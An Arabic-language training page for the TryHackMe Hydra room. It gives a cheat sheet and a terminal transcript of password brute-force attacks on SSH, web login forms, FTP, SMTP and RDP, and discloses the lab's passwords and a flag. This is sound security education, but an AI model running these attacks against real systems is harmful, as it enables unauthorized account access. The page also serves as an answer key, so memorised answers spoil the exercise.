Lab: Hydra | STY IT Labs

STY IT Labs · TryHackMe Room

Lab: Hydra
Password Cracker

تعلّم كيف تستخدم Hydra لكسر كلمات المرور على الـ Web Forms وSSH — أسرع أداة Brute Force في عالم الـ Pentesting.

Easy Difficulty Brute Force HTTP POST Form SSH Attack rockyou.txt Password Cracking

ابدأ اللاب المهام

HYDRA

DifficultyEasy

Duration30 دقيقة - ساعة

Tasks2 مهام

XP Points200 XP

PlatformTryHackMe

TargetLinux

عن اللاب

Hydra هي أسرع أداة Brute Force لكسر كلمات المرور على أكثر من 50 بروتوكول. في اللاب ده هتهاجم account اسمه molly على نوعين من الخدمات:

أولاً: هجوم على نموذج تسجيل دخول ويب (HTTP POST Form) في /login باستخدام rockyou.txt — هتلاقي الـ password هي sunshine.

ثانياً: هجوم على SSH بنفس المستخدم — الـ password هي butterfly. كل flag في مكانها بعد ما تدخل بالـ credentials.

استخدم -t 4 مع SSH عشان تتجنب الـ rate limiting — Hydra بيحذرك من كده تلقائياً.

Hydra Badge

أكمل اللاب واحصل على الـ Badge الرسمي — أضفه لملفك على LinkedIn

أوضاع الهجوم

HTTP POST Form

SSH Brute Force

FTP Attack

SMTP Attack

RDP Attack

Advanced

Hydra Cheat Sheet

الأمر	الوصف	النوع
hydra -l user -P wordlist.txt IP ssh	هجوم SSH بمستخدم واحد	SSH
hydra -l user -P wordlist.txt IP ssh -t 4	SSH مع تحديد الـ threads	SSH
hydra -L users.txt -P pass.txt IP ssh	هجوم SSH بقوائم users وpasswords	SSH
hydra -l user -P wl IP http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"	HTTP POST Form attack	HTTP
hydra -l user -P wl IP ftp	هجوم FTP	FTP
hydra -l user -P wl IP smtp	هجوم SMTP	SMTP
hydra -l user -P wl IP rdp	هجوم Remote Desktop	RDP
hydra ... -V	Verbose — يعرض كل محاولة	Verbose
hydra ... -o output.txt	حفظ النتائج في ملف	Output

المهام والأسئلة

Task 1 — Hydra Introduction

Read about Hydra · install · supported protocols · syntax

+10 XP

Task 2 — Using Hydra

Bruteforce molly's web password → Flag 1 · Bruteforce SSH → Flag 2

+190 XP

▶ أدخل الـ Flag الخاص بمهمتك الحالية

Terminal — Hydra Attacks

root@kali — Hydra Attack

# ── Attack 1: HTTP POST Form ─────────────────

└─# hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.X.X http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V -t 4

Hydra v9.4 starting at 2025-01-01

[DATA] attacking http-post-form://10.10.X.X:80/login

[ATTEMPT] target 10.10.X.X - login "molly" - pass "123456"

[ATTEMPT] target 10.10.X.X - login "molly" - pass "iloveyou"

[80][http-post-form] host: 10.10.X.X login: molly password: sunshine

# ── Attack 2: SSH ────────────────────────────

└─# hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.X.X ssh -t 4

[DATA] attacking ssh://10.10.X.X:22/

[22][ssh] host: 10.10.X.X login: molly password: butterfly

└─# ssh molly@10.10.X.X

molly@10.10.X.X's password: butterfly

molly@ip:~$ cat flag2.txt

THM{c8eeb0468febbadea859baeb33b2541b}

└─#

المهارات المكتسبة

Brute Force Attacks

HTTP POST Form

SSH Password Attack

Wordlist Strategy

rockyou.txt

Credential Testing

Web Login Bypass

Multi-Protocol Support

الأدوات المستخدمة

hydraأداة الـ Brute Force الرئيسية

rockyou.txtأشهر wordlist لكسر الـ passwords

Browser DevToolsتحليل الـ POST request للـ login form

sshالاتصال بالـ server بعد كسر الـ password

افتح الـ DevTools وسجّل دخول غلط عشان تشوف الـ POST body والـ failure message — هتحتاجهم في أمر Hydra.

تقدمك في اللاب

50%PROGRESS

1 / 2 مهام مكتملة

ابدأ اللاب على TryHackMe شوف الـ Writeup تحميل Cheat Sheet

تحتاج TryHackMe VPN أو AttackBox

Hints

Hint 1 — HTTP Form Params−10 XP

Hint 2 — Failure String−20 XP

Hint 3 — SSH Command−20 XP

Labs مشابهة

Nmap: The Basics

Easy · TryHackMe

🔐

RootMe

Easy · TryHackMe

Gobuster: Basics

Easy · TryHackMe

Lab: HydraPassword Cracker

عن اللاب

Hydra Badge

أوضاع الهجوم

Hydra Cheat Sheet

المهام والأسئلة

Task 1 — Hydra Introduction

Task 2 — Using Hydra

Terminal — Hydra Attacks

المهارات المكتسبة

الأدوات المستخدمة

تقدمك في اللاب

Hints

Labs مشابهة

Nmap: The Basics

RootMe

Gobuster: Basics

Lab: Hydra
Password Cracker